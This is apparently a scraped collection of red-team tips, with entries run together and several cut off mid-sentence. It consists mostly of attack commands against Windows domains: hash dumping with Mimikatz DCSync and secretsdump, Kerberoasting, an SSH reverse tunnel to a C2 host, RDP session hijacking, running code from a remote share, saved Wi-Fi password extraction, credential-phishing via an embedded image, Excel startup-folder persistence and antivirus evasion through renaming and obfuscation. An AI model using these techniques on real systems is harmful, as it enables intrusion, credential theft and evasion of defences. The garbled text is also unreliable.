nltest /dclist, nslookup -q=srv _kerberos._tcp (domain suffix can autocomplete)ssh c2 -R *:80:localhost:80. SSH config GatewayPorts yesC:\$Recycle.BinTask list, netstat and wmic process list full | findstr /I commandline for more ideas!net users /domain try using net use /dompowershell -encodedcommand? Try powershell -ecpowershell . (nslookup -q=txt calc.vincentyiu.co.uk )[-1]\\127.0.0.1\c$net use \\targetip\ipc$ password /u:domain\username then sc to psexec\\?\GLOBALROOT\Device\HarddiskVolumeShadowColy1\malware.exe/dll then delete VSCsysteminfo | findstr /i bootquery user to see who else is connected to the machine.net use * http://totallylegit.com/share then start z:sc create sesshijack binpath= "cmd.exe /k tscon <ID> /dest:<SESSIONNAME>" then use putty sessionnslookup -q=srv _ldap._tcpif its domain joined Invoke-Kerberoastwmic /node:"<computer>" OS get LastBootUpTime in a for loopwmic /node:"host" process list brief :) then look at RT #82sqldeveloper.exescript case sensitive and <registration case insensitive.<havexhavex> but not <havexDATABLOBhavex>ping 8.8.8.8 works, try ICMP tunnelling. More info at http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html?m=1 from @fragsh3ll though only on immature networknslookup google.com if it resolves you may have a DNS tunnelling problem.office2john to get hash and crack in Hashcat!Invoke-MapDomainTrusts from PowerView? Use @harmj0y DomainTrustExplorer to generate a graph https://github.com/sixdub/DomainTrustExplorerReplicating directory changes rights, dcsync to pull hash using that account.secretsdump.py? :) Try using the DC machine account to authenticate and dump instead of a user! Save hashcat IPs.txt | sort -t . -k1,1 -k2,2 -k3,3 -k4,4 or even `cat IPs.txt | sort -v"at.exe b64::[encoded params]netsh wlan show profile name="ssid" key=clearrpcping -s 127.0.0.1 -t ncacn_np to leak hash.kill -9 $ssh -l user target -TGet-WmiObject -Class MicrosoftDNS_AType -NameSpace Root\MicrosoftDNS -ComputerName DC001 | Export-CSV -not dns.csvC:\windows\system32\inetsrv\appcmd list site to find IIS bindings.net view \\fileserv /all to try other shares and folders!<scriptlet> with <package> and add <component id="test"> around the rest. Thx @subTeemsds-allowedtodelagateto HTTP you can exploit to obtain HOST and CIFSwhoami? Use echo %userprofile% echo %username% Or replace echo with anything that reflects error: ie. setGet-NetSubnet, Get-NetSite in PowerView or browse in AD explorer. Can help find your way :)WMIC /node:host process call create “echo > C:\windows\perfc”/etc/dhcp/dhclient.conf and remove gethostname() for Opsec when you VPN or have to rock up on site.rundll32, try control @domchell and winword /L @subTee ? change indicators!net users /domain? Try out n^eT^1 us^er^s /dorundll32.exe a lot? Try copy it to another directory to appear as diff name. http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/lsadump::dcsync /all /csv in Mimikatz to perform DRSUAPI grabbing of all hashes! Nice.Top297Million-Probable, rockyou was decent for a quick smash, but lately found out about Keyboard Walks. Add keyboard walks with rules into your cracking routines to get more hashes cracked! https://github.com/hashcat/kwprocessor … Share your ideas!Get-ACL on SYSVOL. Works for me.Win32_Product. Makes an event log entry for tons of MSIinstaller source. Holy crap, this is going on my black list.%USERPROFILE%\Links\Desktop.lnkMimikatz to Mimidogz will bypass China common security products such as 360. :)Domain user -> public role -> UNC leak -> relay or crack using eg. Inveigh -> suddenly born as a new man! https://github.com/NetSPI/PowerUpSQL other cool bits in here worth noting. I do OS admin to SYSADMIN a lot! https://github.com/NetSPI/PowerUpSQL[img]url/cat.png[/img] for example. Use https://github.com/vysec/basicAuth , set PNG as a PHP execution extension. Embed that PNG and whenever someone visits the page it will prompt for credentials.goaccess -> apt-get install goaccess. Then goaccess -f /var/log/nginx/access.log Pretty cool! Now you can see who's hitting your redirector and what they're grabbing at all times in live view? Good for red team dash boards.zgrep -f doms-filter.txt scans.gz | awk -F\"name\":\" '{print $2}' | awk -F"\",\"type '{print $1}' | tee -a doms-subs.txt to get a nice list of subdomains for every DomLink recovered associated domain? :)type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
Thank @francisacer1 for the path to Bookmarks.bak :Dhttps://login.windows.net/companyname.onmicrosoft.com/.well-known/openid-configuration. Not sure why when I Google Tenant ID, people censor it out when it's publicly accessible without any authentication. Bunch of interesting output from the request anyhow.(netsh wlan show profiles) | Select-String '\:(.+)#x27; | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)} | Select-String 'Key Content\W+\:(.+)#x27; | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0, to allow multiple sessions on a server per user. This is useful if you want to login to the jump-host, but that guy's just on all-day-long... 😶c:\users\%username%\appdata\roaming\microsoft\excel\xlstart\ There won't be any Macro prompts either because it's a trusted location by default.